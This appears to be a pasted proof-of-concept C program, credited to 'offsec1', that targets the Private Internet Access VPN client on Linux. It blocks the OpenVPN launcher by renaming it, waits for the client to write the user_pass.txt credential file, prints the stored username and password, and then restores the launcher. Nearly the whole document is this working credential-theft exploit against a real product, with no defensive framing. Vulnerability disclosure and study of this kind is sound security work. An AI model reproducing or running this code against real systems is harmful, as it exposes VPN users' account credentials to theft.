PIA programs are leaking your username and password

1. #include <sys/stat.h>
2. #include <unistd.h>
3. #include <stdio.h>
4. #include <sys/file.h>
5.  
6. //quickest way to check if a file exists
7. bool fileExists(const char *name) {
8. struct stat buffer;
9. return (stat (name, &buffer) == 0);
10. }
11.  
12. int main() {
13.  
14. const char* author = "offsec1";
15. const char* openvpnOriginal = "/opt/pia/openvpn_launcher.64";
16. const char* openvpnNew = "/opt/pia/openvpn_launcher.64_lock";
17. const char* fileName = "/home/anonuser/.pia_manager/data/user_pass.txt";
18.  
19. FILE* file;
20. int c;
21.  
22. printf("PoC - PrivateInternetAccess get username and password\n");
23. printf("made by %s\n\n", author);
24.  
25. if (rename(openvpnOriginal, openvpnNew) == -1) {
26. printf("[-] cannot rename file... are you root?\n");
27. return 0;
28. }
29.  
30. printf("[+] openvpn file was blocked\n");
31.  
32. while (!fileExists(fileName)) {
33. }
34.  
35. printf("[+] found file\n\n");
36. sleep(1);
37.  
38. file = fopen(fileName, "r");
39.  
40. while ( (c = fgetc(file)) != EOF)
41. putchar(c);
42.  
43. printf("\n[+] success\n");
44. printf("cleanup...\n");
45. fclose(file);
46. rename(openvpnNew, openvpnOriginal);
47.  
48. }